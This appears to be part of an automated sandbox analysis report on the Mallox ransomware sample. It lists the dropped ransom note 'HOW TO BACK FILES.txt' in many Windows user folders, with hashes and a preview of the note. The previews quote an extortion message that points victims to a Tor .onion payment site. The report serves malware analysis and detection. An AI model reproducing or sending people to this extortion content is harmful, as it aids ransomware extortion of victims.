                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\SendTo\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessibility\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Maintenance\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\System Tools\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\Desktop\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\Documents\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\Downloads\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\Favorites\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\Links\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\Music\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\OneDrive\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\Pictures\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
                    SSDEEP:24:a/uY2308Lcq39xe+6L1ruW67nGVcyuZHVnFmFEIs/pPR4mZPnv0AVCQyYFaH6K:a/uY2JJ9bZGyV59jpZTPnv0AVCh
                    MD5:6DDFF72889E32381AFDC270CC8EC3394
                    SHA1:9BA2588C500BBE558A7DFF173EAE2F23576B10DD
                    SHA-256:F8BCDB525719DC59A0AEA71CF563C2674A76D6354BAC320F707327F27BB8DAA2
                    SHA-512:FEFE0EF592802132AAEEC075A257FCC72B5C75F3EF3E2A66CECCF6049666D8EDB0DD27F0215E45DB8788A064CCB660130546EB10AEB748365404C5F920636266
                    Malicious:false
                    Preview:Hello....Your files are encrypted and can not be used..We have downloaded your confidential data and are ready to publish it on our blog..To return your files in work condition you need decryption tool..Follow the instructions to decrypt all your data....Do not try to change or restore files yourself, this will break them..If you want, on our site you can decrypt one file for free. Free test decryption allowed only for not valuable file with size less than 3MB....How to get decryption tool:..1) Download and install TOR browser by this link: https://www.torproject.org/download/..2) If TOR blocked in your country and you can't access to the link then use any VPN software..3) Run TOR browser and open the site: wtyafjyhwqrgo4a45wdvvwhen3cx4euie73qvlhkhvlrexljoyuklaad.onion/mallox/privateSignin..4) Copy your private ID in the input field. Your Private key: 9012E04F2C4927607FA56A90..5) You will see payment information and we can make free test decryption here..6)After payment, you will recei

                    C:\Users\Default\Saved Games\HOW TO BACK FILES.txt

                    Download File
                    Process:C:\Users\user\Desktop\Ransomware Mallox.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):1410
                    Entropy (8bit):4.764173461001785
                    Encrypted:false
